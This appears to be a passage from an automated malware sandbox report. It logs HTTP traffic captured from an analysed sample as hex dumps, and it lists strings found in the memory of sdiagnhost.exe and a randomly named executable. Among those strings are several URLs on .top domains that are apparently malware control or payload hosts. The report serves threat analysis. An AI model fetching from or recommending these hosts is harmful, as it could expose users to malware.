71 df 92 94 6f af 92 58 d9 89 a4 3d aa 71 b8 6a 85 f0 b5 bd fa 18 c5 55 63 bb e7 4a 23 34 c2 24 76 7c 21 34 d0 41 89 39 60 11 cd 6a f3 c4 89 18 3d b0 8e 72 02 a5 c1 70 38 4f c4 52 28 25 24 0b 58 9c 37 82 26 e0 b0 98 62 bd c8 a0 84 38 8c 1d 1b 75 97 78 57 2a f5 8f 51 c4 e1 8a 69 0e 77 cf 38 c1 fa 1f 12 7d 4f c5 a6 b5 47 29 29 e5 2c 9f 5b 59 0f 52 2b a5 ff 26 4e 16 a1 16 17 ca 02 8d c0 9e 48 32 a1 5e 48 13 2a 4c 89 9a f1 b5 b6 72 2b 00 66 8f 4a 4b 49 bc 5d 22 48 a3 96 a6 23 5d b9 41 03 94 df 6f fa 48 d1 b5 7a 79 97 6d 7c 6f 7f 18 86 1d f7 e4 e3 d7 cb d3 f7 9d f1 bb ef c7 c3 a4 86 3a 8d be 5f c3 e9 55 8d 0c bb 9d ea 00 45 fc bc 7b 75 ea 42 3c c6 e3 77 cd f6 81 62 d7 d1 de 6d f7 f2 72 ec ef b6 d7 da 51 e8 92 83 f7 b7 9f f9 70 70 b5 db bc 3d 8e 71 ea d7 0e 63 f8 4e fc ce Data Ascii: 1faar-l
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 18 Mar 2024 13:48:36 GMTServer: ApacheExpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <https://hzw.avt.temporary.site/wp-json/>; rel="https://api.w.org/"Upgrade: h2,h2cConnection: UpgradeVary: Accept-EncodingContent-Encoding: gzipX-Endurance-Cache-Level: 2X-nginx-cache: WordPressTransfer-Encoding: chunkedContent-Type: text/html; charset=UTF-8Data Raw: 31 66 61 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 dc b2 db 72 db ca 92 2d fa 6c 7f 05 16 15 6b cb 9e 8b 00 41 90 94 44 ea b2 96 2d 5b 12 25 59 b6 75 a3 c4 ee 0e 47 a1 aa 08 94 58 40 c1 55 05 5e a4 f0 c7 f4 07 ec a7 fd b6 5f 4e c4 ee 1f 3b 59 00 78 93 a8 8b ed 39 fb ec 38 b2 09 a0 b2 32 47 8e 1c 39 b6 fe f6 e1 f3 ee f9 f5 97 8f 56 a8 23 be b3 65 9e 16 47 71 b0 5d a2 aa 04 67 8a c8 ce 56 44 35 b2 70 88 a4 a2 7a bb 74 71 be 67 6f 94 8a 68 8c 22 ba 5d 1a 30 3a 4c 84 d4 25 0b 8b 58 d3 18 b2 86 8c e8 70 9b d0 01 c3 d4 ce 0e 65 8b c5 4c 33 c4 6d 85 11 a7 db 55 c0 e0 2c ee 5b 92 f2 ed 52 22 45 8f 71 5a b2 42 49 7b db a5 50 eb 44 b5 2a 95 20 4a 02 47 c8 a0 32 ea c5 95 6a 75 a1 ed aa 14 be d0 6a 75 da 74 35 16 2c 26 74 54 b6 7a 82 73 31 5c b5 2a 3b 5b 9a 69 4e 77 be a0 80 5a b1 d0 70 93 c6 c4 b2 ad 4f 9f 2f db 9f da 1f 4f ce 3f 5b 87 17 97 f0 be f8 60 ed 7e fe 74 71 d2 3e 7f 77 da 7e b7 55 c9 eb f2 76 40 2e a1 52 8f b7 4b 22 68 71 61 e8 cf 8d 4a d5 b7 8f 67 25 d3 eb 61 72 86 32 97 fb b3 3c 1e 81 55 4c d3 6f 46 84 39 e8 17 20 59 5b 0a 4b 96 68 4b 8f 13 58 1b 4a 12 ce 30 d2 4c c4 15 4e fe 71 a3 44 0c 78 1c 29 b5 5d 1a 0b a4 34 6c 2a a4 11 b2 03 89 92 b0 b4 73 57 fa 57 d6 6d a4 4b ad e9 86 f2 14 b3 a3 52 b9 f4 af 3c b3 f5 6f 90 6a 7a 40 5e 87 fa 67 c0 d6 5c 32 32 57 17 de 0e 1d 34 d0 8e a6 11 58 07 c9 b1 63 86 aa ac 0c a9 af f2 fc 54 f2 e7 f3 21 2f d3 a1 f5 ec fc e5 12 a1 f9 f8 30 2f e4 43 20 11 46 3a b0 e4 3b 9c 07 e7 78 9f 51 24 71 58 5c 94 4b 1a c9 80 c2 dc b3 84 8f b1 96 e3 2f e0 38 9d 73 3d 07 62 1c 69 fa 3c e7 7f aa ed 3b 95 c1 7f d3 54 46 df 94 96 2c 0e 7e 94 7e 94 4b df 53 2a c7 36 8b 93 d4 68 2c e9 f7 94 49 4a 72 bf 3f 2c 29 fd f8 8f 72 89 c5 c7 28 0e 52 30 16 54 50 05 b1 1f 5b 95 7c 50 58 38 67 71 df 92 94 6f af 92 58 d9 89 a4 3d aa 71 b8 6a 85 f0 b5 bd fa 18 c5 55 63 bb e7 4a 23 34 c2 24 76 7c 21 34 d0 41 89 39 60 11 cd 6a f3 c4 89 18 3d b0 8e 72 02 a5 c1 70 38 4f c4 52 28 25 24 0b 58 9c 37 82 26 e0 b0 98 62 bd c8 a0 84 38 8c 1d 1b 75 97 78 57 2a f5 8f 51 c4 e1 8a 69 0e 77 cf 38 c1 fa 1f 12 7d 4f c5 a6 b5 47 29 29 e5 2c 9f 5b 59 0f 52 2b a5 ff 26 4e 16 a1 16 17 ca 02 8d c0 9e 48 32 a1 5e 48 13 2a 4c 89 9a f1 b5 b6 72 2b 00 66 8f 4a 4b 49 bc 5d 22 48 a3 96 a6 23 5d b9 41 03 94 df 6f fa 48 d1 b5 7a 79 97 6d 7c 6f 7f 18 86 1d f7 e4 e3 d7 cb d3 f7 9d f1 bb ef c7 c3 a4 86 3a 8d be 5f c3 e9 55 8d 0c bb 9d ea 00 45 fc bc 7b 75 ea 42 3c c6 e3 77 cd f6 81 62 d7 d1 de 6d f7 f2 72 ec ef b6 d7 da 51 e8 92 83 f7 b7 9f f9 70 70 b5 db bc 3d 8e 71 ea d7 0e 63 f8 4e fc ce Data Ascii: 1faar-l
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 18 Mar 2024 13:48:39 GMTServer: ApacheExpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <https://hzw.avt.temporary.site/wp-json/>; rel="https://api.w.org/"Upgrade: h2,h2cConnection: UpgradeVary: Accept-EncodingContent-Encoding: gzipX-Endurance-Cache-Level: 2X-nginx-cache: WordPressTransfer-Encoding: chunkedContent-Type: text/html; charset=UTF-8Data Raw: 31 66 61 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 dc b2 db 72 db ca 92 2d fa 6c 7f 05 16 15 6b cb 9e 8b 00 41 90 94 44 ea b2 96 2d 5b 12 25 59 b6 75 a3 c4 ee 0e 47 a1 aa 08 94 58 40 c1 55 05 5e a4 f0 c7 f4 07 ec a7 fd b6 5f 4e c4 ee 1f 3b 59 00 78 93 a8 8b ed 39 fb ec 38 b2 09 a0 b2 32 47 8e 1c 39 b6 fe f6 e1 f3 ee f9 f5 97 8f 56 a8 23 be b3 65 9e 16 47 71 b0 5d a2 aa 04 67 8a c8 ce 56 44 35 b2 70 88 a4 a2 7a bb 74 71 be 67 6f 94 8a 68 8c 22 ba 5d 1a 30 3a 4c 84 d4 25 0b 8b 58 d3 18 b2 86 8c e8 70 9b d0 01 c3 d4 ce 0e 65 8b c5 4c 33 c4 6d 85 11 a7 db 55 c0 e0 2c ee 5b 92 f2 ed 52 22 45 8f 71 5a b2 42 49 7b db a5 50 eb 44 b5 2a 95 20 4a 02 47 c8 a0 32 ea c5 95 6a 75 a1 ed aa 14 be d0 6a 75 da 74 35 16 2c 26 74 54 b6 7a 82 73 31 5c b5 2a 3b 5b 9a 69 4e 77 be a0 80 5a b1 d0 70 93 c6 c4 b2 ad 4f 9f 2f db 9f da 1f 4f ce 3f 5b 87 17 97 f0 be f8 60 ed 7e fe 74 71 d2 3e 7f 77 da 7e b7 55 c9 eb f2 76 40 2e a1 52 8f b7 4b 22 68 71 61 e8 cf 8d 4a d5 b7 8f 67 25 d3 eb 61 72 86 32 97 fb b3 3c 1e 81 55 4c d3 6f 46 84 39 e8 17 20 59 5b 0a 4b 96 68 4b 8f 13 58 1b 4a 12 ce 30 d2 4c c4 15 4e fe 71 a3 44 0c 78 1c 29 b5 5d 1a 0b a4 34 6c 2a a4 11 b2 03 89 92 b0 b4 73 57 fa 57 d6 6d a4 4b ad e9 86 f2 14 b3 a3 52 b9 f4 af 3c b3 f5 6f 90 6a 7a 40 5e 87 fa 67 c0 d6 5c 32 32 57 17 de 0e 1d 34 d0 8e a6 11 58 07 c9 b1 63 86 aa ac 0c a9 af f2 fc 54 f2 e7 f3 21 2f d3 a1 f5 ec fc e5 12 a1 f9 f8 30 2f e4 43 20 11 46 3a b0 e4 3b 9c 07 e7 78 9f 51 24 71 58 5c 94 4b 1a c9 80 c2 dc b3 84 8f b1 96 e3 2f e0 38 9d 73 3d 07 62 1c 69 fa 3c e7 7f aa ed 3b 95 c1 7f d3 54 46 df 94 96 2c 0e 7e 94 7e 94 4b df 53 2a c7 36 8b 93 d4 68 2c e9 f7 94 49 4a 72 bf 3f 2c 29 fd f8 8f 72 89 c5 c7 28 0e 52 30 16 54 50 05 b1 1f 5b 95 7c 50 58 38 67 71 df 92 94 6f af 92 58 d9 89 a4 3d aa 71 b8 6a 85 f0 b5 bd fa 18 c5 55 63 bb e7 4a 23 34 c2 24 76 7c 21 34 d0 41 89 39 60 11 cd 6a f3 c4 89 18 3d b0 8e 72 02 a5 c1 70 38 4f c4 52 28 25 24 0b 58 9c 37 82 26 e0 b0 98 62 bd c8 a0 84 38 8c 1d 1b 75 97 78 57 2a f5 8f 51 c4 e1 8a 69 0e 77 cf 38 c1 fa 1f 12 7d 4f c5 a6 b5 47 29 29 e5 2c 9f 5b 59 0f 52 2b a5 ff 26 4e 16 a1 16 17 ca 02 8d c0 9e 48 32 a1 5e 48 13 2a 4c 89 9a f1 b5 b6 72 2b 00 66 8f 4a 4b 49 bc 5d 22 48 a3 96 a6 23 5d b9 41 03 94 df 6f fa 48 d1 b5 7a 79 97 6d 7c 6f 7f 18 86 1d f7 e4 e3 d7 cb d3 f7 9d f1 bb ef c7 c3 a4 86 3a 8d be 5f c3 e9 55 8d 0c bb 9d ea 00 45 fc bc 7b 75 ea 42 3c c6 e3 77 cd f6 81 62 d7 d1 de 6d f7 f2 72 ec ef b6 d7 da 51 e8 92 83 f7 b7 9f f9 70 70 b5 db bc 3d 8e 71 ea d7 0e 63 f8 4e fc ce Data Ascii: 1faar-l
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 18 Mar 2024 13:48:42 GMTServer: nginx/1.23.4Content-Type: text/html; charset=UTF-8Expires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <https://hzw.avt.temporary.site/wp-json/>; rel="https://api.w.org/"Vary: Accept-EncodingX-Endurance-Cache-Level: 2X-nginx-cache: WordPressTransfer-Encoding: chunkedData Raw: 33 39 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 73 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6e 6f 69 6e 64 65 78 2c 20 66 6f 6c 6c 6f 77 27 20 2f 3e 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 2d 20 4d 4f 56 49 4d 49 45 4e 54 4f 20 4a 55 56 45 4e 54 55 44 20 43 4f 4d 55 4e 49 54 41 52 49 41 3c 2f 74 69 74 6c 65 3e 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 6c 6f 63 61 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 65 73 5f 45 53 22 20 2f 3e 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 74 69 74 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 2d 20 4d 4f 56 49 4d 49 45 4e 54 4f 20 4a 55 56 45 4e 54 55 44 20 43 4f 4d 55 4e 49 54 41 52 49 41 22 20 2f 3e 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 73 69 74 65 5f 6e 61 6d 65 22 20 63 6f 6e 74 65 6e 74 3d 22 4d 4f 56 49 4d 49 45 4e 54 4f 20 4a 55 56 45 4e 54 55 44 20 43 4f 4d 55 4e 49 54 41 52 49 41 22 20 2f 3e 20 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6c 64 2b 6a 73 6f 6e 22 20 63 6c 61 73 73 3d 22 79 6f 61 73 74 2d 73 63 68 65 6d 61 2d 67 72 61 70 68 22 3e 7b 22 40 63 6f 6e 74 65 78 74 22 3a 22 68 74 74 70 73 3a 2f 2f 73 63 68 65 6d 61 2e 6f 72 67 22 2c 22 40 67 72 61 70 68 22 3a 5b 7b 22 40 74 79 70 65 22 3a 22 57 65 62 53 69 74 65 22 2c 22 40 69 64 22 3a 22 68 74 74 70 73 3a 2f 2f 68 7a 77 2e 61 76 74 2e 74 65 6d 70 6f 72 61 72 79 2e 73 69 74 65 2f 23 77 65 62 73 69 74 65 22 2c 22 75 72 6c 22 3a 22 68 74 74 70 73 3a 2f 2f 68 7a 77 2e 61 76 74 2e 74 65 6d 70 6f 72 61 72 79 2e 73 69 74 65 2f 22 2c 22 6e 61 6d 65 22 3a 22 4d 4f 56 49 4d 49 45 4e 54 4f 20 4a 55 56 45 4e 54 55 44 20 43 4f 4d 55 4e 49 54 41 52 49 41 22 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 22 2c 22 70 6f 74 65 6e 74 69 61 6c 41 63 74 69 6f 6e 22 3a 5b 7b 22 40 74 79 70 65 22 3a 22 53 65 61 72 63 68 41 63 74 69 6f 6e 22 2c 22 74 61 72 67 65 74 22 3a 7b 22 40 74 79 70 65 22 3a 22 45 6e 74 72 79 50 6f 69 6e 74 22 2c 22 75 72 6c 54 65 6d 70 6c 61 74 65 22 3a 22 68 74 74 70 73
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 18 Mar 2024 13:49:01 GMTContent-Type: text/htmlContent-Length: 548Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 18 Mar 2024 13:49:03 GMTContent-Type: text/htmlContent-Length: 548Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 18 Mar 2024 13:49:06 GMTContent-Type: text/htmlContent-Length: 548Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 18 Mar 2024 13:49:09 GMTContent-Type: text/htmlContent-Length: 548Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: sdiagnhost.exe, 00000015.00000002.3738117615.00000000071B0000.00000004.00000800.00020000.00000000.sdmp, sdiagnhost.exe, 00000015.00000002.3735432410.000000000549C000.00000004.10000000.00040000.00000000.sdmp, EnKifmZDGZ.exe, 00000019.00000002.3734561340.000000000395C000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: http://1mt8.ss1yp.top/g9sb/
Source: sdiagnhost.exe, 00000015.00000002.3738117615.00000000071B0000.00000004.00000800.00020000.00000000.sdmp, sdiagnhost.exe, 00000015.00000002.3735432410.000000000549C000.00000004.10000000.00040000.00000000.sdmp, EnKifmZDGZ.exe, 00000019.00000002.3734561340.000000000395C000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: http://3djf.a1gao.top/3xe/xc9.xls
Source: sdiagnhost.exe, 00000015.00000002.3735432410.000000000549C000.00000004.10000000.00040000.00000000.sdmp, EnKifmZDGZ.exe, 00000019.00000002.3734561340.000000000395C000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: http://83zj4.d2um5.top/x88q/
Source: sdiagnhost.exe, 00000015.00000002.3738117615.00000000071B0000.00000004.00000800.00020000.00000000.sdmp, sdiagnhost.exe, 00000015.00000002.3735432410.000000000549C000.00000004.10000000.00040000.00000000.sdmp, EnKifmZDGZ.exe, 00000019.00000002.3734561340.000000000395C000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: http://8jyhnm7.6cnd2.top/47n0u/
Source: sdiagnhost.exe, 00000015.00000002.3738117615.00000000071B0000.00000004.00000800.00020000.00000000.sdmp, sdiagnhost.exe, 00000015.00000002.3735432410.000000000549C000.00000004.10000000.00040000.00000000.sdmp, EnKifmZDGZ.exe, 00000019.00000002.3734561340.000000000395C000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: http://bgj.sf3l2.top/1j7rknm/
Source: sdiagnhost.exe, 00000015.00000003.1627416777.0000000007D77000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: sdiagnhost.exe, 00000015.00000003.1627416777.0000000007D77000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
